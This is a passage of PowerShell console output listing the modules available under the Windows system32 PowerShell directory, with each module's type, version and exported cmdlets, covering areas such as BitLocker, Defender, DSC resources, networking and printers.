Script 0.0 PSReadline {Get-PSReadlineOption, Set-PSReadlineKeyHandler, Get-PSReadlineKeyHandler, Set-PSReadlineOption...}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 1.0.0.0 AppBackgroundTask {Disable-AppBackgroundTaskDiagnosticLog, Enable-AppBackgroundTaskDiagnosticLog, Set-AppBackgroundTaskResourcePolicy, Unregister-AppBackground...
Manifest 2.0.0.0 AppLocker {Get-AppLockerFileInformation, Get-AppLockerPolicy, New-AppLockerPolicy, Set-AppLockerPolicy...}
Manifest 1.0.0.0 AppvClient {Add-AppvClientConnectionGroup, Add-AppvClientPackage, Add-AppvPublishingServer, Disable-Appv...}
Script 0.0 AppVClientCmdlets {Get-AppvVirtualProcess, Start-AppvVirtualProcess}
Manifest 2.0.0.0 Appx {Add-AppxPackage, Get-AppxPackage, Get-AppxPackageManifest, Remove-AppxPackage...}
Script 0.0 Appx {Get-AppxLastError, Get-AppxLog}
Script 1.0.0.0 AssignedAccess {Clear-AssignedAccess, Get-AssignedAccess, Set-AssignedAccess}
Script 0.0 AssignedAccess {Get-AssignedAccess, Set-AssignedAccess, Clear-AssignedAccess}
Manifest 1.0.0.0 BitLocker {Unlock-BitLocker, Suspend-BitLocker, Resume-BitLocker, Remove-BitLockerKeyProtector...}
Script 1.0.0.0 BitLocker {Unlock-BitLocker, Suspend-BitLocker, Resume-BitLocker, Remove-BitLockerKeyProtector...}
Manifest 2.0.0.0 BitsTransfer {Add-BitsFile, Complete-BitsTransfer, Get-BitsTransfer, Remove-BitsTransfer...}
Manifest 1.0.0.0 BranchCache {Add-BCDataCacheExtension, Clear-BCCache, Disable-BC, Disable-BCDowngrading...}
Cim 1.0.0 BranchCacheClientSettingData Get-BCClientConfiguration
Cim 1.0.0 BranchCacheContentServerSettingData Get-BCContentServerConfiguration
Cim 1.0.0 BranchCacheHostedCacheServerSett... Get-BCHostedCacheServerConfiguration
Cim 1.0.0 BranchCacheNetworkSettingData Get-BCNetworkConfiguration
Cim 1.0.0 BranchCacheOrchestrator {Add-BCDataCacheExtension, Clear-BCCache, Disable-BC, Disable-BCDowngrading...}
Cim 1.0.0 BranchCachePrimaryPublicationCac... Get-BCHashCache
Cim 1.0.0 BranchCachePrimaryRepublicationC... Get-BCDataCache
Cim 1.0.0 BranchCacheSecondaryRepublicatio... Get-BCDataCacheExtension
Cim 1.0.0 BranchCacheStatus Get-BCStatus
Cim 1.0 CIM_PhysicalComputerSystemView {Get-PcsvDevice, Start-PcsvDevice, Stop-PcsvDevice, Restart-PcsvDevice...}
Manifest 1.0.0.0 CimCmdlets {Get-CimAssociatedInstance, Get-CimClass, Get-CimInstance, Get-CimSession...}
Script 0.0 CmdletHelpers {CmdletShouldProcess, Get-NetworkSwitchRegisteredProfileFromNamespace, Get-NetworkSwitchImplementationNamespace, New-LocalCimInstance...}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 CompositeResourceHelper {BuildResourceCommonParameters, BuildResourceString}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 1.0 ConfigCI {Get-SystemDriver, New-CIPolicyRule, New-CIPolicy, Get-CIPolicy...}
Manifest 1.0 Defender {Get-MpPreference, Set-MpPreference, Add-MpPreference, Remove-MpPreference...}
Manifest 1.0.0.0 DirectAccessClientComponents {Disable-DAManualEntryPointSelection, Enable-DAManualEntryPointSelection, Get-DAClientExperienceConfiguration, Get-DAEntryPointTableItem...}
Cim 2.0.0.0 Disable-DscDebug Disable-DscDebug
Cim 1.0.0.0 Disk {Get-Disk, Initialize-Disk, Clear-Disk, New-Partition...}
Cim 1.0.0.0 DiskImage {Get-DiskImage, Mount-DiskImage, Dismount-DiskImage}
Script 3.0 Dism {Add-AppxProvisionedPackage, Add-WindowsDriver, Add-WindowsCapability, Add-WindowsImage...}
Script 3.0 Dism {Add-AppxProvisionedPackage, Add-WindowsDriver, Add-WindowsCapability, Add-WindowsImage...}
Manifest 1.0.0.0 DnsClient {Resolve-DnsName, Clear-DnsClientCache, Get-DnsClient, Get-DnsClientCache...}
Binary 10.0.0.0 dnslookup Resolve-DnsName
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DownloadManager
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 1.0 DSCFileDownloadManager {Get-DscAction, Get-DSCDocument, Get-DSCModule}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 DSCResourceHelper IsNanoServer
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 2.0.0.0 Enable-DscDebug Enable-DscDebug
Manifest 1.0.0.0 EventTracingManagement {New-EtwTraceSession, Get-EtwTraceSession, Set-EtwTraceSession, Send-EtwTraceSession...}
Cim 1.0.0.0 FileIntegrity {Get-FileIntegrity, Set-FileIntegrity, Repair-FileIntegrity}
Cim 1.0.0.0 FileServer {Get-StorageFileServer, Remove-StorageFileServer, Set-StorageFileServer, New-FileShare}
Cim 1.0.0.0 FileShare {Get-FileShare, Remove-FileShare, Grant-FileShareAccess, Block-FileShareAccess...}
Cim 1.0.0.0 FileStorageTier {Get-FileStorageTier, Set-FileStorageTier, Clear-FileStorageTier}
Cim 2.0.0.0 Get-DscConfiguration Get-DscConfiguration
Cim 2.0.0.0 Get-DscConfigurationStatus Get-DscConfigurationStatus
Cim 2.0.0.0 Get-DSCLocalConfigurationManager Get-DscLocalConfigurationManager
Script 0.0 GetStartApps {Get-StartApps, Get-AllStartApps}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 1.0 GroupSet {BuildResourceCommonParameters, BuildResourceString}
Script 1.0 GroupSet {BuildResourceCommonParameters, BuildResourceString}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0.0.0 InitiatorId {Get-InitiatorId, Remove-InitiatorId}
Cim 1.0.0.0 InitiatorPort {Get-InitiatorPort, Set-InitiatorPort}
Manifest 2.0.0.0 International {Get-WinDefaultInputMethodOverride, Set-WinDefaultInputMethodOverride, Get-WinHomeLocation, Set-WinHomeLocation...}
Manifest 1.0.0.0 iSCSI {Get-IscsiTargetPortal, New-IscsiTargetPortal, Remove-IscsiTargetPortal, Update-IscsiTargetPortal...}
Cim 1.0 iSCSIConnection Get-IscsiConnection
Cim 1.0 iSCSISession {Get-IscsiSession, Unregister-IscsiSession, Register-IscsiSession, Set-IscsiChapSecret}
Cim 1.0 iSCSITarget {Get-IscsiTarget, Disconnect-IscsiTarget, Update-IscsiTarget, Connect-IscsiTarget}
Cim 1.0 iSCSITargetPortal {Get-IscsiTargetPortal, Remove-IscsiTargetPortal, Update-IscsiTargetPortal, New-IscsiTargetPortal}
Script 1.0.0.0 ise {New-IseSnippet, Import-IseSnippet, Get-IseSnippet}
Script 0.0 ise {Import-IseSnippet, Get-IseSnippet, New-IseSnippet}
Manifest 1.0.0.0 Kds {Add-KdsRootKey, Get-KdsRootKey, Test-KdsRootKey, Set-KdsConfiguration...}
Cim 1.0.0.0 MaskingSet {Get-MaskingSet, Remove-MaskingSet, Rename-MaskingSet, Add-InitiatorIdToMaskingSet...}
Binary 10.0.0.0 Microsoft.AppV.AppvClientComCons...
Binary 10.0.0.0 Microsoft.AppV.AppVClientPowerShell {Add-AppvClientConnectionGroup, Add-AppvClientPackage, Add-AppvPublishingServer, Disable-Appv...}
Binary 0.0.0.0 Microsoft.AppV.ClientProgrammabi...
Binary 0.0.0.0 Microsoft.BackgroundIntelligentT...
Binary 0.0.0.0 Microsoft.BitLocker.Structures
Binary 10.0.0.0 Microsoft.Dism.PowerShell {Add-WindowsPackage, Remove-WindowsPackage, Get-WindowsPackage, Enable-WindowsOptionalFeature...}
Manifest 1.0.1.0 Microsoft.PowerShell.Archive {Compress-Archive, Expand-Archive}
Script 0.0 Microsoft.PowerShell.Archive {Compress-Archive, Expand-Archive, GetResolvedPathHelper, Add-CompressionAssemblies...}
Manifest 3.0.0.0 Microsoft.PowerShell.Diagnostics {Get-WinEvent, Get-Counter, Import-Counter, Export-Counter...}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DownloadManager
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Binary 3.0.0.0 Microsoft.PowerShell.DSC.FileDow... {Get-DscAction, Get-DSCDocument, Get-DSCModule}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 3.0.0.0 Microsoft.PowerShell.Host {Start-Transcript, Stop-Transcript}
Binary 3.0.0.0 Microsoft.PowerShell.LocalAccounts {Add-LocalGroupMember, Disable-LocalUser, Enable-LocalUser, Get-LocalGroup...}
Manifest 1.0.0.0 Microsoft.PowerShell.LocalAccounts {Add-LocalGroupMember, Disable-LocalUser, Enable-LocalUser, Get-LocalGroup...}
Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Content, Clear-Content, Clear-ItemProperty, Join-Path...}
Script 1.0 Microsoft.PowerShell.ODataUtils Export-ODataEndpointProxy
Script 1.0 Microsoft.PowerShell.ODataUtils Export-ODataEndpointProxy
Manifest 3.0.0.0 Microsoft.PowerShell.Security {Get-Acl, Set-Acl, Get-PfxCertificate, Get-Credential...}
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Format-List, Format-Custom, Format-Table, Format-Wide...}
Script 0.0 Microsoft.PowerShell.Utility {Get-FileHash, New-TemporaryFile, New-Guid, Format-Hex...}
Binary 10.0.0.0 Microsoft.Uev.Commands {Clear-UevConfiguration, Clear-UevAppxPackage, Restore-UevBackup, Set-UevTemplateProfile...}
Binary 10.0.0.0 Microsoft.Windows.AppBackgroundT... {Enable-AppBackgroundTaskDiagnosticLog, Disable-AppBackgroundTaskDiagnosticLog, Set-AppBackgroundTaskResourcePolicy}
Binary 10.0.0.0 Microsoft.Windows.Firewall.Commands {New-NetIPsecAuthProposal, New-NetIPsecMainModeCryptoProposal, New-NetIPsecQuickModeCryptoProposal, Get-DAPolicyChange}
Binary 10.0.0.0 Microsoft.WindowsErrorReporting.... {Enable-WindowsErrorReporting, Disable-WindowsErrorReporting, Get-WindowsErrorReporting}
Binary 10.0.0.0 Microsoft.WindowsSearch.Commands {Get-WindowsSearchSetting, Set-WindowsSearchSetting}
Manifest 3.0.0.0 Microsoft.WSMan.Management {Disable-WSManCredSSP, Enable-WSManCredSSP, Get-WSManCredSSP, Set-WSManQuickConfig...}
Manifest 1.0 MMAgent {Disable-MMAgent, Enable-MMAgent, Set-MMAgent, Get-MMAgent...}
Manifest 1.0.0.0 MsDtc {New-DtcDiagnosticTransaction, Complete-DtcDiagnosticTransaction, Join-DtcDiagnosticResourceManager, Receive-DtcDiagnosticTransaction...}
Cim 1.0 MSFT_3DPrinter_v1.0
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 MSFT_ArchiveResource {Test-TargetResource, Set-TargetResource, Get-TargetResource}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0.0.0 MSFT_AutologgerConfig_v1.0 {Get-AutologgerConfig, Set-AutologgerConfig, Remove-AutologgerConfig, New-AutologgerConfig}
Cim 1.0 MSFT_DAClientExperienceConfigura... {Get-DAClientExperienceConfiguration, Set-DAClientExperienceConfiguration, Reset-DAClientExperienceConfiguration}
Cim 1.0 MSFT_DAConnectionStatus Get-DAConnectionStatus
Cim 1.0 MSFT_DASiteTableEntry {Get-DAEntryPointTableItem, Set-DAEntryPointTableItem, Remove-DAEntryPointTableItem, Reset-DAEntryPointTableItem...}
Cim 1.0.0 MSFT_DnsClient {Get-DnsClient, Set-DnsClient, Register-DnsClient}
Cim 1.0.0 MSFT_DnsClientCache {Get-DnsClientCache, Clear-DnsClientCache}
Cim 1.0.0 MSFT_DnsClientGlobalSetting {Get-DnsClientGlobalSetting, Set-DnsClientGlobalSetting}
Cim 1.0.0 MSFT_DnsClientServerAddress {Get-DnsClientServerAddress, Set-DnsClientServerAddress}
Cim 1.0 MSFT_DtcAdvancedHostSettingTask_... {Get-DtcAdvancedHostSetting, Set-DtcAdvancedHostSetting}
Cim 1.0 MSFT_DtcAdvancedSettingTask_v1.0 {Get-DtcAdvancedSetting, Set-DtcAdvancedSetting}
Cim 1.0 MSFT_DtcClusterDefaultTask_v1.0 {Get-DtcClusterDefault, Set-DtcClusterDefault}
Cim 1.0 MSFT_DtcClusterTMMappingTask_v1.0 {Add-DtcClusterTMMapping, Get-DtcClusterTMMapping, Remove-DtcClusterTMMapping, Set-DtcClusterTMMapping}
Cim 1.0 MSFT_DtcDefaultTask_v1.0 {Get-DtcDefault, Set-DtcDefault}
Cim 1.0 MSFT_DtcLogTask_v1.0 {Get-DtcLog, Reset-DtcLog, Set-DtcLog}
Cim 1.0 MSFT_DtcNetworkSettingTask_v1.0 {Get-DtcNetworkSetting, Set-DtcNetworkSetting}
Cim 1.0 MSFT_DtcTask_v1.0 {Get-Dtc, Install-Dtc, Start-Dtc, Stop-Dtc...}
Cim 1.0 MSFT_DtcTransactionsStatisticsTa... Get-DtcTransactionsStatistics
Cim 1.0 MSFT_DtcTransactionsTraceSession... {Get-DtcTransactionsTraceSession, Set-DtcTransactionsTraceSession, Start-DtcTransactionsTraceSession, Stop-DtcTransactionsTraceSession...}
Cim 1.0 MSFT_DtcTransactionsTraceSetting... {Get-DtcTransactionsTraceSetting, Set-DtcTransactionsTraceSetting}
Cim 1.0 MSFT_DtcTransactionTask_v1.0 {Get-DtcTransaction, Set-DtcTransaction}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 MSFT_EnvironmentResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0.0.0 MSFT_EtwTraceProvider_v1.0 {Get-EtwTraceProvider, Set-EtwTraceProvider, Remove-EtwTraceProvider, Add-EtwTraceProvider}
Cim 1.0.0.0 MSFT_EtwTraceSession_v1.0 {Get-EtwTraceSession, Remove-EtwTraceSession, Set-EtwTraceSession, Send-EtwTraceSession...}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 MSFT_GroupResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0 MSFT_LocalPrinterPort_v1.0
Cim 1.0 MSFT_LprPrinterPort_v1.0
Cim 1.0 MSFT_MpComputerStatus Get-MpComputerStatus
Cim 1.0 MSFT_MpPreference {Get-MpPreference, Set-MpPreference, Add-MpPreference, Remove-MpPreference}
Cim 1.0 MSFT_MpScan Start-MpScan
Cim 1.0 MSFT_MpSignature Update-MpSignature
Cim 1.0 MSFT_MpThreat {Get-MpThreat, Remove-MpThreat}
Cim 1.0 MSFT_MpThreatCatalog Get-MpThreatCatalog
Cim 1.0 MSFT_MpThreatDetection Get-MpThreatDetection
Cim 1.0 MSFT_MpWDOScan Start-MpWDOScan
Cim 1.0 MSFT_NCSIPolicyConfiguration {Get-NCSIPolicyConfiguration, Set-NCSIPolicyConfiguration, Reset-NCSIPolicyConfiguration}
Cim 1.0 MSFT_Net6to4Configuration {Get-Net6to4Configuration, Set-Net6to4Configuration, Reset-Net6to4Configuration}
Cim 1.0 MSFT_NetAdapter.cmdletDefinition {Get-NetAdapter, Enable-NetAdapter, Disable-NetAdapter, Restart-NetAdapter...}
Cim 1.0 MSFT_NetAdapterAdvancedProperty.... {Get-NetAdapterAdvancedProperty, Set-NetAdapterAdvancedProperty, Remove-NetAdapterAdvancedProperty, Reset-NetAdapterAdvancedProperty...}
Cim 1.0 MSFT_NetAdapterBinding.cmdletDef... {Get-NetAdapterBinding, Set-NetAdapterBinding, Enable-NetAdapterBinding, Disable-NetAdapterBinding}
Cim 1.0 MSFT_NetAdapterChecksumOffload {Get-NetAdapterChecksumOffload, Set-NetAdapterChecksumOffload, Enable-NetAdapterChecksumOffload, Disable-NetAdapterChecksumOffload}
Cim 1.0 MSFT_NetAdapterEncapsulatedPacke... {Get-NetAdapterEncapsulatedPacketTaskOffload, Set-NetAdapterEncapsulatedPacketTaskOffload, Enable-NetAdapterEncapsulatedPacketTaskOffload, Di...
Cim 1.0 MSFT_NetAdapterHardwareInfo.cmdl... Get-NetAdapterHardwareInfo
Cim 1.0 MSFT_NetAdapterIPsecOffload {Get-NetAdapterIPsecOffload, Set-NetAdapterIPsecOffload, Enable-NetAdapterIPsecOffload, Disable-NetAdapterIPsecOffload}
Cim 1.0 MSFT_NetAdapterLso {Get-NetAdapterLso, Set-NetAdapterLso, Enable-NetAdapterLso, Disable-NetAdapterLso}
Cim 1.0 MSFT_NetAdapterPacketDirect {Get-NetAdapterPacketDirect, Set-NetAdapterPacketDirect, Enable-NetAdapterPacketDirect, Disable-NetAdapterPacketDirect}
Cim 1.0 MSFT_NetAdapterPowerManagement.c... {Get-NetAdapterPowerManagement, Set-NetAdapterPowerManagement, Enable-NetAdapterPowerManagement, Disable-NetAdapterPowerManagement}
Script 0.0 MSFT_NetAdapterPowerManagement.F... {Format-NdisConfigurationValue, Format-WakePatternType, Format-BitmapWakePattern}
Cim 1.0 MSFT_NetAdapterQos {Get-NetAdapterQos, Set-NetAdapterQos, Enable-NetAdapterQos, Disable-NetAdapterQos}
Script 0.0 MSFT_NetAdapterQos.Format.Helper {Format-NetAdapterQosIntegerArray, Format-NetAdapterQosTrafficClass, Format-NetAdapterQosFlowControl, Format-NetAdapterQosClassification}
Cim 1.0 MSFT_NetAdapterRdma {Get-NetAdapterRdma, Set-NetAdapterRdma, Enable-NetAdapterRdma, Disable-NetAdapterRdma}
Cim 1.0 MSFT_NetAdapterRsc {Get-NetAdapterRsc, Set-NetAdapterRsc, Enable-NetAdapterRsc, Disable-NetAdapterRsc}
Cim 1.0 MSFT_NetAdapterRss.cmdletDefinition {Get-NetAdapterRss, Set-NetAdapterRss, Enable-NetAdapterRss, Disable-NetAdapterRss}
Cim 1.0 MSFT_NetAdapterSriov {Get-NetAdapterSriov, Set-NetAdapterSriov, Enable-NetAdapterSriov, Disable-NetAdapterSriov}
Cim 1.0 MSFT_NetAdapterSriovVf.cmdletDef... Get-NetAdapterSriovVf
Cim 1.0 MSFT_NetAdapterStatistics.cmdlet... Get-NetAdapterStatistics
Cim 1.0 MSFT_NetAdapterVmq.cmdletDefinition {Get-NetAdapterVmq, Set-NetAdapterVmq, Enable-NetAdapterVmq, Disable-NetAdapterVmq}
Cim 1.0 MSFT_NetAdapterVmqQueue.cmdletDe... Get-NetAdapterVmqQueue
Cim 1.0 MSFT_NetAdapterVPort.cmdletDefin... Get-NetAdapterVPort
Cim 1.0 MSFT_NetCompartment Get-NetCompartment
Cim 1.0 MSFT_NetConnectionProfile {Get-NetConnectionProfile, Set-NetConnectionProfile}
Cim 1.0 MSFT_NetDnsTransitionConfiguration {Get-NetDnsTransitionConfiguration, Enable-NetDnsTransitionConfiguration, Disable-NetDnsTransitionConfiguration, Reset-NetDnsTransitionConfig...
Cim 1.0 MSFT_NetDnsTransitionMonitoring Get-NetDnsTransitionMonitoring
Cim 1.1 MSFT_NetEventNetworkAdapter {Get-NetEventNetworkAdapter, Remove-NetEventNetworkAdapter, Add-NetEventNetworkAdapter}
Cim 1.0 MSFT_NetEventPacketCaptureProvider {Get-NetEventPacketCaptureProvider, Remove-NetEventPacketCaptureProvider, Set-NetEventPacketCaptureProvider, Add-NetEventPacketCaptureProvider}
Cim 1.0 MSFT_NetEventProvider {Get-NetEventProvider, Remove-NetEventProvider, Set-NetEventProvider, Add-NetEventProvider}
Cim 1.0 MSFT_NetEventSession {Get-NetEventSession, Remove-NetEventSession, Set-NetEventSession, Start-NetEventSession...}
Cim 1.0 MSFT_NetEventVFPProvider {Get-NetEventVFPProvider, Remove-NetEventVFPProvider, Set-NetEventVFPProvider, Add-NetEventVFPProvider}
Cim 1.0 MSFT_NetEventVmNetworkAdatper {Get-NetEventVmNetworkAdapter, Remove-NetEventVmNetworkAdapter, Add-NetEventVmNetworkAdapter}
Cim 1.0 MSFT_NetEventVmSwitch {Get-NetEventVmSwitch, Remove-NetEventVmSwitch, Add-NetEventVmSwitch}
Cim 1.0 MSFT_NetEventVmSwitchProvider {Get-NetEventVmSwitchProvider, Remove-NetEventVmSwitchProvider, Set-NetEventVmSwitchProvider, Add-NetEventVmSwitchProvider}
Cim 1.0 MSFT_NetEventWFPCaptureProvider {Get-NetEventWFPCaptureProvider, Remove-NetEventWFPCaptureProvider, Set-NetEventWFPCaptureProvider, Add-NetEventWFPCaptureProvider}
Cim 1.0.0 MSFT_NetIPAddress {Get-NetIPAddress, Set-NetIPAddress, Remove-NetIPAddress, New-NetIPAddress}
Cim 1.0 MSFT_NetIpHTTPsConfiguration {Get-NetIPHttpsConfiguration, Set-NetIPHttpsConfiguration, Remove-NetIPHttpsConfiguration, Reset-NetIPHttpsConfiguration...}
Cim 1.0 MSFT_NetIpHTTPsState Get-NetIPHttpsState
Cim 1.0.0 MSFT_NetIPInterface {Get-NetIPInterface, Set-NetIPInterface}
Cim 1.0.0 MSFT_NetIPv4Protocol {Get-NetIPv4Protocol, Set-NetIPv4Protocol}
Cim 1.0.0 MSFT_NetIPv6Protocol {Get-NetIPv6Protocol, Set-NetIPv6Protocol}
Cim 1.0 MSFT_NetISATAPConfiguration {Get-NetIsatapConfiguration, Set-NetIsatapConfiguration, Reset-NetIsatapConfiguration}
Cim 1.0 MSFT_NetLbfoTeam {Get-NetLbfoTeam, Remove-NetLbfoTeam, Set-NetLbfoTeam, New-NetLbfoTeam...}
Cim 1.0 MSFT_NetLbfoTeamMember {Get-NetLbfoTeamMember, Set-NetLbfoTeamMember, Remove-NetLbfoTeamMember, Add-NetLbfoTeamMember}
Cim 1.0 MSFT_NetLbfoTeamNic {Get-NetLbfoTeamNic, Set-NetLbfoTeamNic, Remove-NetLbfoTeamNic, Add-NetLbfoTeamNic}
Cim 1.0 MSFT_NetNat {Get-NetNat, Set-NetNat, Remove-NetNat, New-NetNat}
Cim 1.0 MSFT_NetNatExternalAddress {Get-NetNatExternalAddress, Remove-NetNatExternalAddress, Add-NetNatExternalAddress}
Cim 1.0 MSFT_NetNatGlobal {Get-NetNatGlobal, Set-NetNatGlobal}
Cim 1.0 MSFT_NetNatSession Get-NetNatSession
Cim 1.0 MSFT_NetNatStaticMapping {Get-NetNatStaticMapping, Remove-NetNatStaticMapping, Add-NetNatStaticMapping}
Cim 1.0 MSFT_NetNatTransitionConfiguration {Get-NetNatTransitionConfiguration, Set-NetNatTransitionConfiguration, Enable-NetNatTransitionConfiguration, Disable-NetNatTransitionConfigur...
Cim 1.0 MSFT_NetNatTransitionMonitoring Get-NetNatTransitionMonitoring
Cim 1.0.0 MSFT_NetNeighbor {Get-NetNeighbor, Set-NetNeighbor, Remove-NetNeighbor, New-NetNeighbor}
Cim 1.0.0 MSFT_NetOffloadGlobalSetting {Get-NetOffloadGlobalSetting, Set-NetOffloadGlobalSetting}
Cim 1.0.0 MSFT_NetPrefixPolicy Get-NetPrefixPolicy
Cim 1.0 MSFT_NetQosPolicy {Get-NetQosPolicy, Set-NetQosPolicy, Remove-NetQosPolicy, New-NetQosPolicy}
Script 0.0 MSFT_NetQosPolicy.Format.Helper Format-NetQosPolicySpeed
Cim 1.0.0 MSFT_NetRoute {Get-NetRoute, Set-NetRoute, Remove-NetRoute, New-NetRoute...}
Cim 1.0 MSFT_NetSwitchTeam {Get-NetSwitchTeam, Remove-NetSwitchTeam, New-NetSwitchTeam, Rename-NetSwitchTeam...}
Cim 1.0 MSFT_NetSwitchTeamMember Get-NetSwitchTeamMember
Cim 1.0.0 MSFT_NetTCPConnection Get-NetTCPConnection
Cim 1.0.0 MSFT_NetTCPSetting {Get-NetTCPSetting, Set-NetTCPSetting}
Cim 1.0 MSFT_NetTeredoConfiguration {Get-NetTeredoConfiguration, Set-NetTeredoConfiguration, Reset-NetTeredoConfiguration}
Cim 1.0 MSFT_NetTeredoState Get-NetTeredoState
Cim 1.0.0 MSFT_NetTransportFilter {Get-NetTransportFilter, Remove-NetTransportFilter, New-NetTransportFilter}
Cim 1.0.0 MSFT_NetUDPEndpoint Get-NetUDPEndpoint
Cim 1.0.0 MSFT_NetUDPSetting {Get-NetUDPSetting, Set-NetUDPSetting}
Cim 1.0 MSFT_OdbcDriverTask_v1.0 {Get-OdbcDriver, Set-OdbcDriver}
Cim 1.0 MSFT_OdbcDsnTask_v1.0 {Add-OdbcDsn, Get-OdbcDsn, Remove-OdbcDsn, Set-OdbcDsn}
Cim 1.0 MSFT_OdbcPerfCounterTask_v1.0 {Disable-OdbcPerfCounter, Enable-OdbcPerfCounter, Get-OdbcPerfCounter}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 MSFT_PackageResource {Test-TargetResource, Get-TargetResource, Set-TargetResource}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0 MSFT_Printer_v1.0 {Get-Printer, Remove-Printer, Set-Printer, Add-Printer...}
Cim 1.0 MSFT_PrinterConfiguration_v1.0 {Get-PrintConfiguration, Set-PrintConfiguration}
Cim 1.0 MSFT_PrinterDriver_v1.0 {Get-PrinterDriver, Remove-PrinterDriver, Add-PrinterDriver}
Cim 1.0 MSFT_PrinterNfcTag_v1.0
Cim 1.0 MSFT_PrinterNfcTagTasks_v1.0 {Read-PrinterNfcTag, Write-PrinterNfcTag}
Cim 1.0 MSFT_PrinterPort_v1.0 {Get-PrinterPort, Remove-PrinterPort}
Cim 1.0 MSFT_PrinterPortTasks_v1.0 Add-PrinterPort
Cim 1.0 MSFT_PrinterProperty_v1.0 {Get-PrinterProperty, Set-PrinterProperty}
Cim 1.0 MSFT_PrintJob_v1.0 {Get-PrintJob, Remove-PrintJob, Restart-PrintJob, Resume-PrintJob...}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 MSFT_ProcessResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Script 0.0 MSFT_RegistryResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Script 0.0 MSFT_RoleResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0 MSFT_ScheduledTask_v1.0 {Get-ScheduledTask, Unregister-ScheduledTask}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 MSFT_ScriptResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Script 0.0 MSFT_ServiceResource {Get-TargetResource, Test-TargetResource, Set-TargetResource}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0 MSFT_TcpIpPrinterPort_v1.0
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 MSFT_UserResource {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Script 0.0 MSFT_WaitForAll {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Script 0.0 MSFT_WaitForAny {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Script 0.0 MSFT_WaitForSome {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0 MSFT_WdacBidTraceTask_v1.0 {Disable-WdacBidTrace, Enable-WdacBidTrace, Get-WdacBidTrace}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 MSFT_WindowsOptionalFeature {Get-TargetResource, Set-TargetResource, Test-TargetResource}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0 MSFT_WsdPrinterPort_v1.0
Manifest 2.0.0.0 NetAdapter {Disable-NetAdapter, Disable-NetAdapterBinding, Disable-NetAdapterChecksumOffload, Disable-NetAdapterEncapsulatedPacketTaskOffload...}
